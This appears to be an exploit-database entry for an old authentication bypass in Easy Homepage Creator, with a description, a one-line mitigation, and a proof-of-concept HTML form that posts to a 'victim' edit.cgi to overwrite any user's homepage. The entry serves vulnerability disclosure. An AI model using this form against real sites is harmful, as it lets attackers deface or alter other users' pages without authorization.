Easy Homepage Creator Vulnerability

vendor:

Easy Homepage Creator

by:

SecurityFocus

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Easy Homepage Creator

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

Easy Homepage Creator Vulnerability

Easy Homepage Creator fails to properly authenticate users who wish to edit home pages, allowing an attacker to modify any user's home page.

Mitigation:

Ensure that proper authentication is enforced for users who wish to edit home pages.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5340/info

The vulnerability has been reported for Easy Homepage Creator. It is possible for an atttacker to modify any user's home page. The vulnerability is the result of Homepage Creator failing to properly authenticate users who wish to edit home pages. 

<html><center>
<h1>Easy Homepage Creator Vulnerability</h1>
<table border=0 cellpadding=2 cellspacing=1 width="90%">
<FORM method="POST" name=edit action="http://victim/homepage/edit.cgi">
Username: <input name="username"><br>
You can edit other user homepage below :
<textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88">
Please type your messages in here.
&lt;/textarea&gt;
<tr>
<td class=top>
<input class=button type="submit" value="Edit Homepage" name="edit_homepage"></td>
</tr>
</FORM>
</table>
</html>